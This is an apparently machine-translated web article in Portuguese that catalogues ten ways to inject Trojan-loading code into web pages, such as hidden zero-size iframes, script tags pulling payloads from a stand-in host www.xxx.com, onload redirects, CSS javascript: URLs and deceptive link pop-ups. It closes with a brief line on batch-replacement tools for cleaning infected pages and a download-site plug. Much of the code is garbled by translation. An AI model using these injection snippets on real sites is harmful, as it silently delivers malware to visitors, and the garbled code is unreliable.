1: Horse pendurado de quadro
<iframe src = endereçoWidth = 0 altura = 0> </iframe>
Entre eles, os links maliciosos do site podem ser inseridos no "endereço"
Dois: Arquivo JS pendurado
Desde que seja um arquivo JS, ele pode ser modificado maliciosamente e o código malicioso pode ser pendurado. Geralmente, é mais provável que o código JS referenciado por todo o site esteja pendurado com os Trojans. Podemos verificar a esquerda ou a parte inferior do código JS. Pessoas ruins gostam de ocultar o código malicioso e o código normal com muitos espaços ou retorno do carro, por isso devemos verificar se a página de código JS é deliberadamente prolongada, etc.
Três: criptografia de deformação do JS
<Script Language = "jscript.encode" src = http: //www.xxx.com/muma.txt> </sCript>
muma.txt pode ser alterado para qualquer sufixo
Quatro: corpo pendura o cavalo
<corpo onload = "window.location = 'endereço';"> </body>
Cinco: escondendo um cavalo invisível
top.document.body.innerhtml = top.document.body.innerhtml + '/r/n <iframe src = "http://www.xxx.com/muma.htm/"> </frame>;
Seis: CSS Hang Horse
corpo {
Antecedentes-Imagem: URL ('JavaScript: Document.Write ("<Script src = http: //www.xxx.net/muma.js> </sCript>")')}
Este método é mais cruel e difícil de encontrar.
Sete: Jaja Hang Horse
<Idioma do script = javascript>
window.open ("endereço", "", "barra de ferramentas = não, localização = não, diretórios = não, status = não, menubar = não, scro llbars = não, largura = 1, altura = 1");
</script>
Oito: disfarce de imagem
<html>
<iframe src = "博题题题题" altura = 0 largura = 0> </frame>
<img src = "Endereço da imagem"> </central>
</html>
Nove: chamada disfarçada
<Frameset linhas = "444,0" cols = "*">
<quadro src = "abertura web pagage" frameberder = "no" rolling = "Auto" noresize marginwidth = "0" margingHeight = "0">
<quadro src = "Endereço do cavalo líquido" frameBerder = "no" rolling = "no" noresize marginwidth = "0" marggingHeight = "0">
</frameSet>
Dez: Decepção avançada
<a href = "http://www.163.com (confundiu o endereço de conexão, exiba esse endereço para o endereço de Trojan)" onmouseover = "www_163_com (); return true;"> o que exibir na página </a>
<Script Language = "JavaScript">
função www_163_com ()
{
var url = "博题题题题题题";
aberto (url, "newwindow", "barra de ferramentas = não, localização = não, diretórios = não, status = não, menubar = não, scrollbars = não, redimensível = não, copyhistory = sim, largura = 800, altura = 600, esquerda = 10, topo = 10");
}
</Script>
Como descobrir o comportamento acima? Se várias páginas tiverem códigos de cavalo, serão necessárias ferramentas de substituição em lote. É recomendável que você o use.
Alguns downloads do canal do servidor do novo site do webmaster (mais software podem ser baixados em s.vevb.com)